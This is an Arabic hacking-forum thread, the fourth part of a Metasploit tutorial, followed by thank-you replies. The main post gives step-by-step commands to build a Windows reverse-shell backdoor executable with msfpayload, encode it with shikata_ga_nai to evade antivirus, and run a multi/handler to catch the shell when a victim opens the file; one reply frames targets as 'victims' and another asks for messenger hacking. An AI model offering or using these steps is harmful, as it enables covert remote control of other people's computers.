طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 15

الموضوع: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

  1. #1
    :: مشرف عام :: Aljyyosh Team الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    Hasri طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )



    مرحباً بكم مجدداً ياأعضاء منتديات جيوش الهكر ، اليوم راح نتناول موضوع مهم واستخدام مهم لإداة الميتاسبلويت ، سنتناول بإذن الله عملية ، صناعة باك دور - وشيل كود وتشفيرة ، لنتابع...


    صناعة Shellcode / Backdoor وتشفيره


    من أهم ميزات مشروع ميتاسبلويت قدرته على صناعة شيل كود بالخيارات التي نريدها بمنتهى السرعة والسهولة, كما قلت سابقا سنحتاج للشيل كود في كتابة استغلال الثغرة فعندما يتم اكتشاف ثغرة في برنامج ما يجب أن يتم برمجة برنامج بسيط يقوم باستغلالها وهذا الأمر يرجع للمكتشف فالبعض يختار Perl , Python , C حسب الثغرة وطبيعتها لكن الأمر المؤكد أننا سنحتاج لشيل كود مبرمج بلغة Assembly بخصائص معينة, يتم حقنه داخل الذاكرة وتنفيذه من قبل المعالج مباشرة مع العلم أن برمجة هذا الكود ليس بالأمر السهل لذلك الأغلبية يلجأ لاستخدام Shellcode جاهز بخيارات محددة مسبقا أما في مشروع ميتاسبلويت فالأمر أسهل من ذلك وأفضل بكثير.. يكفي أنك قادر على صناعة Shellcode بالخيارات التي تريدها خلال بضعة ثوان!

    نستطيع صناعة الـ Shellcode الذي نريده باستخدام الأداة msfpayload الموجودة داخل مجلد المشروع ونستخدم msfencode لتشفيره, في البداية نقوم باستعراض الـ Shellcodes الموجودة داخل المشروع وخيارات msfpayload باستخدام الأمر:


    كود:
    ./msfpayload
    لنفرض أننا نريد استخدم windows/shell/reverse_tcp لانشاء اتصال عكسي, في البداية ننفذ الأمر التالي لمعرفة خيارات الشيل كود:


    كود:
    ./msfpayload windows/shell/reverse_tcp S
    لاحظ أن طريقة استخدام الأداة msfpayload نفس msfcli تماما, لصناعة شيل كود يستخدم في برمجة اسغلال مكتوب بلغة C نقوم في البداية بتحديد الخيارات التي نريدها باستخدام الأمر:

    [/SIZE]


    كود:
    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.2.1 LPORT=22445 C
    نستطيع استبدال C بـ y للغة روبي وبـ P للغة Perl وهكذا… راجع خيارات msfpayload لمعرفة باقي اللغات لكن المميز بالأمر هو قدرة المشروع على صناعة ملف تنفيذي بالامتداد exe (باك دور بسيط) نعيد تنفيذ الأمر السابق مع استبدال C بـ X لكن بهذه الحالة يجب ارسال المخرجات لملف وليس طباعتها على الشاشة! لذلك ننفذ الأمر بهذا الشكل:


    كود:
    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.2.1 LPORT=22445 X > reverse_tcp.exe
    الأن يجب أن نقوم بتشغيل Exploit Handler ليتولى أمر الاتصال العكسي وينجح الاستغلال, شغّل سطر أوامر المشروع وننفذ الأوامر التالية:


    كود:
    ./msfconsole
    msf > use multi/handler
    msf exploit(handler) > set LHOST 192.168.2.1
    msf exploit(handler) > exploit
    لاحظ أننا أدخلنا نفس خيارات الباك دوور reverse_tcp.exe. عند قيام المستخدم بتشغيل الملف التنفيذي سنحصل على revers remote shell كما هو واضح بالصورة التالية:




    الأداة msfencode تقوم بتشفير الشيل كود باحدى المشفّرات التي يوفرها المشروع, في البداية نقوم بصناعة الشيل كود الذي نريده (بصيغة Raw) ونرسل المخرجات لملف باسم shellcode.raw مثلا باستخدام الأمر:


    كود:
    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.2.1 LPORT=22445 R > shellcode.raw
    الآن نستعرض خيارات الأداة msfencode بتنفذ الأمر:


    كود:
    ./msfencode -h



    لتشفير الشيل كود الموجود داخل الملف shellcode.raw ننفذ الأمر:


    كود:
    ./msfencode -i shellcode.raw -e x86/shikata_ga_nai -b'\x00\xff' -t c -o shellcode.c

    في الأمر السابق قمنا بتشفير الشيل كود باستخدام المشفّر x86/shikata_ga_nai مع تجنب استخدام الحروف \x00\xff لأن هذه الحروف تؤدي لتوقف الشيل كود عن العمل عند تشغيله داخل الذاكرة ثم أرسلنا الشيل كود المشفّر للمف shellcode.c لاستخدامه باستغلال مبرمج بلغة C. نستطيع استخدام encoder آخر كل ماعلينا هو تنفيذ الأمر:


    كود:
    ./msfencode -l
    لاستعراض المشفّرات الموجودة داخل المشروع, نستطيع استخدام الأداتين msfpayload و msfencode بنفس الوقت وتصدير الشيل كود لملف أو طباعته على الشاشة مثلا بشكله النهائي باستخدام الأمر:


    كود:
    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.2.1 LPORT=22445 R | ./msfencode
    -e x86/shikata_ga_nai -b'\x00\xff' -t c




    حسناً حاول أن تقوم بصنع باك بدور لنظام ويندوز باستخدام msfpayload ومن ثم تشفيره باحدى المشفّرات الموجودة في msfencode وحاول فحصة باستخدام مضاد الفايروسات, الاصدارات الحديثة من المشروع تكون غير مكشوفة من معظم مضادات الفايروسات كما تستطيع صنع باكدور Meterpreter واستخدامه بنفس الطريق التي استخدمنا فيها باكدور الاتصال العكسي reverse_tcp.exe

    أعلم أني أطلت الموضوع كثيرا وفصّلته بشكل كبير فلقد أردت تغطية أكبر قدر ممكن من امكانيات مشروع ميتاسبلويت وطريقة التعامل معه.. هذا كل شيء حتى الِأن ومن الممكن أن أقوم بكتابة جزء ثالث عن مشروع ميتاسبلويت لاحقا أو أضع شرح فيديو في iSecur1ty أو أدمج المواضيع السابقة وأنسقها من جديد مع بعض الاضافات ليتم تحويلها لكتيّب صغير عن مشروع ميتاسبلويت وكما قلت سابقا ****sploit يتطور بسرعة كبيرة ومع كل اصدار جديد يتم اضافة المزيد من الأدوات والخصائص الجديدة للمشروع ولذلك أنصح بمتابعة موقع المشروع و المدونة الرسمية أيضا وحاول أن تبقي نفسك على اطلاع بـ مجريات تطوير المشروع.

    ملاحظة: استخدام مشروع ميتاسبلويت واستغلال ثغراته يجب أن يتم بدقة وليس من الضروري أن تتمكن من استغلال الثغرة واختراق الجهاز من المرة الأولى! يوجد أكثر من 100 احتمال لعدم عمل الاستغلال بالشكل المطلوب وهنا يأتي دورك لاكتشاف السبب وليس دوري! أنا أشرح طريقة الاستخدام وكيفية التعامل مع المشروع لكني لن أتمكن من معرفة لماذا لم يعمل الاستغلال عندك أو لماذا لم تتمكن من اختراق الجهاز!! قد تكون المشكلة نقص بالحزم الموجودة في جهازك أو من الثغرة, الاعدادات التي اخترتها, الاستغلال أو احدى خياراته, اصدار الثغرة, اصدار النظام الذي تحاول اختراقه مختلف, من الممكن أن يكون مدير النظام قد حدّث النظام أو أصلح الثغرة أو حتى وجود جدار ناري أو أنظمة حماية IDS تمنع تنفيذ الاستغلال… باختصار “Think Out The Box” واعتمد على نفسك في حل المشاكل كما أني أنصح بشدة القيام بتطبيق ما قرأته داخل Lab خاص بك والتدرب على استخدام مشروع ميتاسبلويت واستغلال ثغراته بشكل عملي.


    إلى هنا نكون أنهينا الجزء الرابع والأخير ، وإن شاء الله سنتناول في مواضيع أخرى تطبيقات عملية لمشروع الميتاسبلويت فترقبونا ...


    ودمتم سالمين

    I love Yemen




  2. #2

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    شكرا على الشرح الرائع ويسعدني ان اكون
    اول من يرد على الموضوع
    وانا اسف جدا على
    غيابي عن النتدى
    لاسباب شخصية

  3. #3

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    يعطيك الف الف عافية بس يا ريت يعني تورونا اختراقات المسن + البرنامج لانو اكثر البرامج ملغمة

  4. #4
    هكر مجتهد الصورة الرمزية darts
    تاريخ التسجيل
    Jan 2010
    الدولة
    ببلاد الله الواسعة
    المشاركات
    330

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    مشكور معلمنا جاري التعلم تحياتي
    كن في الحياة كعابر سبيل ... واترك ورائك كل اثر جميل... فما نحن في الحياة الا ضيوف ... وما على الضيوف الا الرحيل !


    شباب انا دخولي بل نت قليل لانو عم سافر بل بحر .......... دعولي

  5. #5

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    ما فهمت وااااالووووووووووو =(

  6. #6

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    la;,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,v

  7. #7
    هكر نشيط
    تاريخ التسجيل
    Sep 2010
    الدولة
    ســــوريـا الغـالـيـة
    المشاركات
    115

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    شكرااا أخي عل الشرح الأكثر من رائع

    وأنا حسب معرفتي المتواضعة أنا الميتا له شروط وهي

    نظام لينوكس(لأن المشروع يعمل أفضل عل لينوكس)+أي بي ثابت + جدار تاري مغلق أو لايحظر البورت المستهدف+بورت مفتوح=ضـــحــيــــة

    تقبل مروري..
    (( المـدنى للـحبال والـجنـدى للـرصاص والتـهكيـر للـعباقـره ))

  8. #8

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    السلام عليكم
    الف شكر علي الشرح
    وجزاك الله خيرا

  9. #9

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    شــــــــــكرا شكرا ع الشررح الررااائع

    في انتظآآآآر الجديد ,,,,,
    لَنْ تَنَـــَـآآآم ‘ لٍــَيـْ ع - حَتَىْ X _ X أُ طَهٍـٍرَ الْفـٍيْـسَـ بُــوكـْ

    مٍنَ أَعْـدآآءٍ الإسْـلآآآمٍـْ وَسَيَتَحَقَـقُ

    بٍإذْنٍ الله

    ReY NeGrO - 0111

  10. #10

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    رؤؤؤؤعة قليل في حقك يابطل .... من أفضل الشروحات الي شفتها في حياتي على الرغم انها قديمة بعض الشيئ


    تحياتي لك

صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. الاختراق المتقدم (m-e-t-a-s-p-l-o-i-t)
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 39
    آخر مشاركة: 03-05-2013, 08:53 PM
  2. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 115
    آخر مشاركة: 12-21-2012, 11:58 PM
  3. التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 10
    آخر مشاركة: 10-02-2012, 10:38 PM
  4. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 2 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 28
    آخر مشاركة: 10-02-2012, 10:03 PM
  5. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 3 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 16
    آخر مشاركة: 11-24-2011, 03:49 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •